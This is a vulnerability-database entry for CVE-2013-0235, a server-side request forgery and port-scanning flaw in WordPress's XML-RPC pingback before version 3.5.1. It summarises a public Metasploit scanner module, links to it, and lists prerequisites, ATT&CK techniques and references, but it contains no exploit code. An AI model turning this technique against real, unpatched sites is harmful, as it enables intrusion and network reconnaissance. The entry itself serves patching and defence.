CVE-2013-0235

WordPress < 3.5.1 - Server-Side Request Forgery via XMLRPC Pingback

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2013-0235. PoCs published by Thomas McCarthy, including Metasploit module auxiliary/scanner/http/wordpress_pingback_access.

AI-analyzed exploit summary This Metasploit module scans WordPress sites for enabled Pingback APIs, which can be abused to perform port scanning via the XML-RPC interface. It checks for the presence of the X-Pingback header and verifies if the Pingback functionality is active.

Description

The XMLRPC API in WordPress before 3.5.1 allows remote attackers to send HTTP requests to intranet servers, and conduct port-scanning attacks, by specifying a crafted source URL for a pingback, related to a Server-Side Request Forgery (SSRF) issue.

Exploits (1)

metasploit SCANNER

by Thomas McCarthy · rubypoc

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/wordpress_pingback_access.rb

View Code ZIP pw:eip

This Metasploit module scans WordPress sites for enabled Pingback APIs, which can be abused to perform port scanning via the XML-RPC interface. It checks for the presence of the X-Pingback header and verifies if the Pingback functionality is active.

Classification

Scanner 100%

Attack Type

Ssrf

Complexity

Moderate

Reliability

Reliable

Target: WordPress (versions prior to 3.5.1)

No auth needed

Prerequisites: WordPress site with exposed XML-RPC interface · Pingback API enabled

MITRE ATT&CK

T1190 - Exploit Public-Facing Application T1133 - External Remote Services

devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (5)

Core 5

Core References

Product x_refsource_confirm

http://codex.wordpress.org/Version_3.5.1

Exploit, Patch x_refsource_confirm

http://core.trac.wordpress.org/changeset/23330

Various Sources x_refsource_misc

http://www.acunetix.com/blog/web-security-zone/wordpress-pingback-vulnerability/

Issue Tracking x_refsource_confirm

https://bugzilla.redhat.com/show_bug.cgi?id=904120

Product x_refsource_confirm

http://wordpress.org/news/2013/01/wordpress-3-5-1/

Scores

EPSS 0.2886

EPSS Percentile 97.9%

Details

Status published

Products (49)

wordpress/wordpress 0.71

wordpress/wordpress 1.0

wordpress/wordpress 1.0.1

wordpress/wordpress 1.0.2

wordpress/wordpress 1.1.1

wordpress/wordpress 1.2

wordpress/wordpress 1.2.1

wordpress/wordpress 1.2.2

wordpress/wordpress 1.2.3

wordpress/wordpress 1.2.4

... and 39 more

Published Jul 08, 2013

Tracked Since Feb 18, 2026